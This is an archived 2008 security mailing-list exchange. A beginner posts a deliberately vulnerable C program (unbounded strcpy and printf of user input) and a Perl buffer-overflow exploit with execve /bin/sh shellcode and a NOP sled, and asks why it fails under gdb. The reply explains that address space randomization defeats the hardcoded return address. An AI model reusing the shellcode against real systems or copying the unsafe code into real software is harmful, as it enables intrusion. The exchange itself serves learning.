From: Ronald van der Westen (rvdwesten@gmail.com)
Date: Mon Jan 14 2008 - 09:11:32 EST
Debian 2.6.18 is using Address Space Randomization, this means that
your stack will be at another address every run. It is not possible to
exploit this with a hardcoded return address.
Cheers,
-p
On 10 Jan 2008 02:09:46 -0000, <loki6@orange.nl> wrote:
> Hi there and thank you for reading this,
>
>
> I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.
>
>
> As I've said I'm new to this field and my goal is to be able to anticipate on possible buffer overflow exploits.
>
>
> I've created this simple script: "test.c" :
>
>
> [code]
>
>
> #include <stdio.h>
>
>
> int main(int argc, char **argv){
>
>
> char buffer[256];
>
>
> if (argc == 1) {
>
> printf("Usage: %s (input)", argv[0]);
>
> }
>
>
> strcpy(buffer, argv[1]);
>
> printf(buffer);
>
>
> return 0;
>
> }
>
>
> [/code]
>
>
>
>
> Then I'm trying to exploit it with:
>
>
>
>
>
> [code]
>
>
> #!/usr/bin/perl
>
>
> $ret = "/x90/x9a/xbf";
>
>
> $shellcode = "\xb0\x0b".
>
> "\x99".
>
> "\x52".
>
> "\x68\x2f\x2f\x73\x68".
>
> "\x68\x2f\x62\x69\x6e".
>
> "\x89\xe3".
>
> "\x52".
>
> "\x53".
>
> "\x89\xe1".
>
> "\xcd\x80";
>
>
>
> $exploit = "\x90" x 235;
>
> $exploit .= $shellcode;
>
> $exploit .= $ret;
>
>
> system("./a.out $exploit");
>
>
> [/code]
>
>
>
> The shellcode is an execve /bin/sh.
>
> When I run the perl script it simply returns my bash prompt. So the exploit didn't work.
>
>
> When I type 'exit' afterwards, I'm dropped from my su shell I was in previously, confirming there isn't a "/bin/sh" process.
>
>
> Now the funny thing is when I overflow the buffer of a.out in gdb, with:
>
>
>
> run `perl -e 'print "A"x262'`
>
> Program received signal SIGSEGV, Segmentation fault
>
> 0x08048412 in main ()
>
>
> It doesn't overflow the EIP, because when I use:
>
> i r
>
>
> It says:
>
>
> eip 0x8048412 0x8048412 <main+126>
>
>
>
> The first time I tried today it overflowed the EIP correctly and I didn't change anything.
>
>
> ECX is 0x41414141 and
>
> ESP is 0x4141413d
>
> EBP is 0xbf004141
>
>
> Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended Instruction Pointer?
>
>
> I was wondering if someone was able to help me with this, because I really want to get the hang of this.
>
>
> I don't know if I got the NOP sled and return address right either, because when using GDB:
>
>
>
> x/s $esp
>
>
> I get:
>
>
> 0x4141413d: <Address 0x4141413d out of bounds
>
>
> I'm kinda stuck from there.
>
>
> My problem in short:
>
>
> - How do I get a reliable return address with GDB
>
> - How do I determine the length of the NOP sled
>
> - How do I test shellcode
>
>
>
> Thanks for reading this..
>
> Thanks for any help, pointers and advice.
>
>
> ironmonkey6
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------
>
>
-- Ronald van der Westen ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT